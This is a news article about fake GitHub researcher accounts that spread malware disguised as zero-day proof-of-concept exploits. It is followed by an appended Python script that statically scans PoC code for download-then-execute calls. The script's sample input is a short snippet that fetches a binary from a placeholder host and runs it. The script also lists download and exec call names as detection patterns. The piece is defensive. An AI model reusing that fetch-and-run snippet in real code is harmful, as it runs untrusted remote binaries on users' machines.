Fraud on GitHub: fake accounts spread malware
A network of fake researchers is using GitHub to spread malicious code disguised as proof-of-concept exploits for supposedly unknown vulnerabilities
Several fake GitHub accounts associated with a fraudulent cybersecurity firm have been spotted spreading malicious repositories on the code hosting service. Seven of these repositories, still accessible at the time of writing, pose as proof-of-concept (PoC) exploits for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange.
A network of lies
VulnCheck, which discovered the activity, said the authors of these repositories have put a lot of effort into making them plausible. They set up a series of Twitter accounts and profiles, pretending to be members of a non-existent company called High Sierra Cyber Security. VulnCheck first discovered these repositories last May, when they were being used to spread similar PoC exploits for zero-day vulnerabilities in Signal and WhatsApp, both of which have now been removed.
Masking the culprits
Not only did the authors share some of their alleged findings on Twitter to boost their legitimacy, but they even used photos of real security researchers from companies like Rapid7, demonstrating significant effort in building the campaign. The "PoC" is a Python script designed to download a malicious binary and run it on the victim's operating system, whether Windows or Linux. "The attacker put a lot of effort into creating all these fake identities, just to distribute easily recognizable malware," said VulnCheck researcher Jacob Baines. "It is unclear whether they have been successful, but the fact that they continue to pursue this attack strategy suggests that they believe they may be."
Final considerations on information security
It is currently unknown whether the perpetrator of these activities is a rookie actor or an advanced persistent threat (APT). However, security researchers have already been targeted by North Korean groups in the past, as revealed by Google in January 2021. These events underscore the importance of exercising caution when downloading code from open source repositories. Users should carefully examine code before executing it, to make sure it does not pose a security risk.
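As an added illustration of the kind of check described above (not code from the article or from VulnCheck), the following Python script statically triages a purported PoC for the download-then-execute pattern the fake exploits use: it parses the file with the standard `ast` module, lists calls that fetch remote content and calls that hand a file to the operating system, notes whether the script branches on the host OS, and returns a verdict without ever running the suspect code. The sample PoC text, the call lists and the function names are the author's own constructions.

```python
import ast

# Call names (as written in source) that fetch remote content ...
DOWNLOAD_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen",
                  "requests.get", "wget.download"}
# ... and call names that hand a file or command to the operating system.
EXEC_CALLS = {"os.system", "os.popen", "os.execv", "os.startfile",
              "subprocess.run", "subprocess.Popen", "subprocess.call"}
# Constructed sample input mirroring the pattern the article describes
# (invalid URL, no real payload): fetch a binary, pick a name per OS, run it.
SAMPLE_POC = '''
import platform, subprocess, urllib.request
url = "http://example.invalid/helper"
dst = "poc.exe" if platform.system() == "Windows" else "./poc"
urllib.request.urlretrieve(url, dst)
subprocess.run([dst])
'''

def _dotted(node):
    """Rebuild 'pkg.mod.func' from a Name/Attribute chain; None if not plain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage(source):
    """Statically triage PoC source text before anyone runs it.

    Returns the download and execute calls seen, whether the script checks
    the host OS, and a verdict: 'download-and-execute' when a fetch call and
    an exec call both occur, otherwise 'review' (a legitimate HTTP exploit
    may use requests.get alone, so manual reading is still required)."""
    tree = ast.parse(source)
    found = {"download": [], "execute": [], "platform_check": False}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in DOWNLOAD_CALLS:
                found["download"].append(name)
            elif name in EXEC_CALLS:
                found["execute"].append(name)
            elif name == "platform.system":
                found["platform_check"] = True
        elif isinstance(node, ast.Attribute) and _dotted(node) == "sys.platform":
            found["platform_check"] = True
    found["verdict"] = ("download-and-execute"
                        if found["download"] and found["execute"] else "review")
    return found

if __name__ == "__main__":
    print(triage(SAMPLE_POC))
```

Obfuscated scripts (exec of decoded strings, aliased imports) evade this name matching, so treat a 'review' verdict as a prompt to read the code, not as a clean bill of health.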
06/14/2023 11:02
Marco Verro